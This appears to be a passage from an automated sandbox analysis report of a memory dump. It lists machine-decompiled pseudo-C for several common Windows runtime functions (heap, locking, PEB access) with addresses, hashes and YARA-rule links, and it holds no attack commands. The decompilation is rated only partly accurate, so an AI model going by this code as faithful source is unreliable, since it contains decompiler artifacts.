						if(_v21 != 0) {
							_t53 = 0;
							E03862280(_t28, 0x3938608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0385FFB0(_t42, _t53, 0x3938608);
							if(_t53 != 0) {
								L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0385FFB0(_t41, _t51, 0x3938608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03884a2c
0x03884a34
0x03884a3c
0x03884a3e
0x03884a48
0x03884a4b
0x03884a4d
0x03884a51
0x03884a9c
0x00000000
0x00000000
0x03884aa3
0x03884aa8
0x03884aad
0x03884ab1
0x03884ade
0x03884ae3
0x03884a5a
0x03884a62
0x03884a6a
0x03884a6e
0x038bf203
0x03884a84
0x03884a88
0x03884a89
0x03884a8a
0x03884a95
0x03884a95
0x03884a79
0x03884a80
0x03884af2
0x03884af4
0x03884af9
0x03884aff
0x03884b01
0x03884b03
0x03884b08
0x038bf20a
0x038bf212
0x038bf216
0x038bf216
0x03884b08
0x03884b13
0x03884b1a
0x038bf229
0x038bf229
0x03884b1a
0x03884a82
0x00000000
0x03884a82
0x03884ab7
0x03884acd
0x03884acd
0x03884ad5
0x03884ada
0x00000000
0x03884ada
0x03884ac2
0x03884acb
0x00000000
0x00000000
0x00000000
0x03884acb
0x03884a53
0x03884a53
0x03884a58
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57379a261af58b63affc86acc0e03410d9c2a294971de893bd5f5ea7e9df7288
Instruction ID: c5f50869333d4f8b6f907e51ea84cfdbd7e44c980ab946dbf1c62d9438567a7c
Opcode Fuzzy Hash: 57379a261af58b63affc86acc0e03410d9c2a294971de893bd5f5ea7e9df7288
Instruction Fuzzy Hash: 3F31D0362493169BC721FFE9C941B6AB7A4EBC1B14F1404D9E9568F641CB74D804CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0387E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0387E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03889670() < 0) {
					L0389DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3937b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03864620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0387E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0387e730
0x0387e736
0x0387e738
0x0387e73d
0x0387e73e
0x0387e740
0x0387e749
0x0387e765
0x0387e76a
0x0387e76b
0x0387e76c
0x0387e76d
0x0387e76e
0x0387e76f
0x0387e775
0x0387e777
0x0387e77e
0x038bb675
0x0387e784
0x0387e784
0x0387e789
0x0387e7a8
0x0387e7ac
0x0387e807
0x0387e7ae
0x0387e7ae
0x0387e7b1
0x0387e7b4
0x0387e7b9
0x0387e7c0
0x0387e7c4
0x0387e7ca
0x0387e7cc
0x00000000
0x0387e7d3
0x0387e7d6
0x00000000
0x00000000
0x0387e7ff
0x0387e802
0x00000000
0x00000000
0x0387e7f9
0x0387e7fc
0x00000000
0x00000000
0x0387e7f3
0x0387e7f6
0x00000000
0x00000000
0x0387e7ed
0x0387e7f0
0x00000000
0x00000000
0x0387e7e7
0x0387e7ea
0x00000000
0x00000000
0x038bb685
0x038bb688
0x00000000
0x00000000
0x038bb682
0x00000000
0x00000000
0x0387e7cc
0x0387e7d9
0x0387e7dc
0x0387e7de
0x0387e7de
0x0387e7ac
0x0387e7e4
0x0387e74b
0x0387e751
0x0387e759
0x0387e761
0x0387e761

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1988d798314ed138404f7312deaab68d4e023a78e2ef687bfbc6b78b3f0925
Instruction ID: d3898c990d864ba43ad5ea62ce956bf16dcd29fb811114cd218e0136511afa67
Opcode Fuzzy Hash: 5a1988d798314ed138404f7312deaab68d4e023a78e2ef687bfbc6b78b3f0925
Instruction Fuzzy Hash: 4D319EB5A14249EFD704CF98C841F9ABBE5FB09354F14829AF914CB341D631EC80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0387BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0387BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3936100; // 0xa
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03862280(0xd, 0x11e0f1a0);
				_t41 =  *0x39360f8; // 0x0
				if(_t41 != 0) {
					 *0x39360f8 =  *_t41;
					 *0x39360fc =  *0x39360fc + 0xffff;
				}
				E0385FFB0(_t41, 0x800, 0x11e0f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x39360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03864620(0x3936100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3936100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0387bc36
0x0387bc42
0x0387bc45
0x0387bc4a
0x0387bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0387bc50
0x0387bc50
0x0387bc58
0x0387bc5a
0x0387bc60
0x00000000
0x00000000
0x038ba4f2
0x038ba4f6
0x00000000
0x00000000
0x00000000
0x038ba4fc
0x0387bc79
0x0387bc7e
0x0387bc86
0x0387bd16
0x0387bd20
0x0387bd20
0x0387bc8d
0x0387bc94
0x0387bcbd
0x0387bcca
0x0387bccb
0x0387bccc
0x0387bccd
0x0387bcce
0x0387bcd4
0x0387bcea
0x0387bcee
0x0387bcf2
0x0387bd00
0x0387bd04
0x00000000
0x0387bc96
0x0387bcab
0x0387bcaf
0x0387bd2c
0x0387bd2c
0x0387bd09
0x00000000
0x0387bd09
0x0387bcb1
0x0387bcb5
0x0387bcbb
0x00000000
0x00000000
0x00000000
0x0387bcbb

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d665b6b54511344b5028faaca973715ee8da80c0a9cfec065e5b0831d027538d
Instruction ID: f8622d54f7a671c98fb9667cc5c468c6f90dcacdbbe4c1b85965a4d91013ba2d
Opcode Fuzzy Hash: d665b6b54511344b5028faaca973715ee8da80c0a9cfec065e5b0831d027538d
Instruction Fuzzy Hash: 83310EB6A04609ABCB02EFD8C4C07A677B6EF18310F0440B8ED48DF205EB34DA05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 03871DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E03871DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0386F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03864620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0386F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x03871dc2
0x03871dc5
0x03871dc7
0x03871dcc
0x03871dce
0x03871dd6
0x03871ddf
0x03871de0
0x03871de1
0x03871de5
0x03871de8
0x03871def
0x03871df0
0x03871df6
0x03871df7
0x03871dfe
0x03871e1a
0x00000000
0x00000000
0x03871e0b
0x03871e12
0x03871e12
0x03871e00
0x03871e00
0x03871e05
0x03871e1e
0x03871e23
0x038b570f
0x038b5713
0x00000000
0x00000000
0x038b5719
0x038b5719
0x03871e2c
0x03871e2d
0x03871e2e
0x03871e2f
0x03871e31
0x03871e32
0x03871e35
0x03871e3d
0x038b5723
0x038b573d
0x038b573d
0x00000000
0x038b5723
0x03871e49
0x03871e4e
0x03871e4e
0x03871e09
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: b57e4b84c3c066a6d91a1f651bc92729d3ef7f0476a4c833bf05f1cec62389fd
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: E0219F36610219EBDB20CFD9CC84EABFBBEEF85A44F254095E901DB610D634EE01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03849100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03849100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x391f6e8);
				E0389D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E039188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0389D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x39386c0; // 0x31507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x39386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03862280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E039188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0388AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x393b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x39384c0;
										if(_t69 >=  *0x39384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03919063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0384922A(_t82);
							_t53 = E03867D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03918B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x39386c0; // 0x31507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x39386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x39386bc;
										_t72 = 0x39386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03849240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x39386c4;
									_t72 = 0x39386c0;
									L18:
									E03879B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x03849100
0x03849100
0x03849100
0x03849100
0x03849102
0x03849107
0x0384910c
0x03849110
0x03849115
0x03849136
0x03849143
0x038a37e4
0x038a37e4
0x03849149
0x0384914e
0x0384914e
0x03849117
0x0384911d
0x00000000
0x00000000
0x0384911f
0x03849125
0x00000000
0x03849151
0x03849158
0x0384915d
0x03849161
0x03849168
0x038a3715
0x00000000
0x0384916e
0x0384916e
0x03849175
0x03849177
0x0384917e
0x0384917f
0x03849182
0x03849182
0x03849187
0x03849187
0x0384918a
0x0384918d
0x0384918f
0x03849192
0x03849195
0x03849198
0x03849198
0x03849198
0x0384919a
0x00000000
0x00000000
0x038a371f
0x038a3721
0x038a3727
0x038a372f
0x038a3733
0x038a3735
0x038a3738
0x038a373b
0x038a373d
0x038a3740
0x00000000
0x00000000
0x038a3746
0x038a3749
0x00000000
0x00000000
0x038a374f
0x038a3751
0x00000000
0x00000000
0x038a3757
0x038a3759
0x038a375c
0x038a375c
0x038a375e
0x038a375e
0x038a3761
0x038a3764
0x00000000
0x00000000
0x038a3766
0x038a3768
0x038a37a3
0x038a37a3
0x038a37a5
0x038a37a7
0x038a37ad
0x038a37b0
0x038a37b2
0x038a37bc
0x038a37c2
0x038a37c2
0x038a37b2
0x03849187
0x03849187
0x0384918a
0x0384918d
0x0384918f
0x03849192
0x03849195
0x00000000
0x03849195
0x00000000
0x03849187
0x038a376a
0x038a376a
0x038a376c
0x038a376c
0x038a376f
0x038a3775
0x00000000
0x00000000
0x038a3777
0x038a3779
0x00000000
0x00000000
0x038a3782
0x038a3787
0x038a3789
0x038a3790
0x038a3790
0x038a378b
0x038a378b
0x038a378b
0x038a3792
0x038a3795
0x038a3795
0x038a3798
0x038a3798
0x038a379b
0x038a379b
0x038491a3
0x038491a9
0x038491b0
0x038491b4
0x038491b4
0x038491bb
0x038491c0
0x038491c5
0x038491c7
0x038a37da
0x038491cd
0x038491cd
0x038491cd
0x038491d2
0x038491d5
0x03849239
0x03849239
0x038491d7
0x038491db
0x038491e1
0x038491e7
0x038491fd
0x03849203
0x0384921e
0x03849223
0x00000000
0x03849223
0x03849205
0x03849208
0x0384920c
0x03849214
0x03849214
0x038491e9
0x038491e9
0x038491ee
0x038491f3
0x038491f3
0x038491f3
0x038491e7
0x00000000
0x038491db
0x03849187
0x03849168

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83e30e7f0691511031a7ab40bc00c4594eded96b5e809a3ce37f0c2cc280258
Instruction ID: 08d092cb6451a1542de47b95aa470b6b165e365899762a08addb2779f1c532b8
Opcode Fuzzy Hash: a83e30e7f0691511031a7ab40bc00c4594eded96b5e809a3ce37f0c2cc280258
Instruction Fuzzy Hash: 6A31937990564DDFEB31DBE8C04879EB7F5BB84314F1881DAD414AB641C378A944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03860050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03860050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x393d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03879ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0388B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03918A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03879702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x393b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x03860055
0x0386005d
0x03860062
0x0386006c
0x0386006f
0x03860074
0x0386007a
0x0386007a
0x03860080
0x03860080
0x03860087
0x0386008d
0x0386008f
0x03860093
0x03860095
0x0386009b
0x038600f8
0x038600fb
0x038600fc
0x038600ff
0x03860108
0x03860108
0x038600a2
0x038600a6
0x038600b3
0x038600bc
0x038600c5
0x038600ca
0x038ac01e
0x00000000
0x00000000
0x038ac02d
0x038600d5
0x038600d9
0x038ac03d
0x038ac046
0x038ac046
0x038600df
0x038600e2
0x038600ea
0x038600ef
0x038600f2
0x038600f6
0x03860111
0x03860117
0x03860117
0x00000000
0x038600f6
0x038600d0
0x038600d0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe0bc7f806dae04651395d28cb21ea0ecab40dfa41a8324e6bc0487a043105a
Instruction ID: 0487af4173cdaf7c4107d216973170f1ce11c1d54100c895ecb3ddd0ddb0fdc0
Opcode Fuzzy Hash: 6fe0bc7f806dae04651395d28cb21ea0ecab40dfa41a8324e6bc0487a043105a
Instruction Fuzzy Hash: 17317A75205B08CFDB25CF68C840B96B3E5FB88714F1845A9E49ACBB90EB75A801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 038C6C0A, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67784168072dbb1140f9fba89128cab964f031572fbf47bdd77e93ac5cd93b93
Instruction ID: 971fd9bc0a696e617ceb15c1183d726a9cdcf19b4e1c0a0a9a50396b70860291
Opcode Fuzzy Hash: 67784168072dbb1140f9fba89128cab964f031572fbf47bdd77e93ac5cd93b93
Instruction Fuzzy Hash: 68218BB5A10684AFD715DBACD880E6AB7B8FF48744F1800A9F905DB791E634ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 038890AF, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: c46385a4c8454a8f3183d765c3b062bbefdd7096b591ebe409514786848e018f
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 00214175A00309EFDB20EF99C544AAAF7F8EB44754F1484EAE949DB250D334E944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03873B7A, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67d6cc61a697daac11a2c786786f5392a76258d5c9d850db69008df3bdd35a5
Instruction ID: 936cda68b6bfe90d8dfa8f6e61715cbe47429d95bec01e6100cad8284ac1cc55
Opcode Fuzzy Hash: b67d6cc61a697daac11a2c786786f5392a76258d5c9d850db69008df3bdd35a5
Instruction Fuzzy Hash: A821BEB6A00208AFC700EF98DD85B5AB7BDFB40608F2500A8E909EB251D375ED05DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 038C6CF0, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c4104cedcb1bfce1a592af861a45d86913b4502a7b874936873897697c02c6
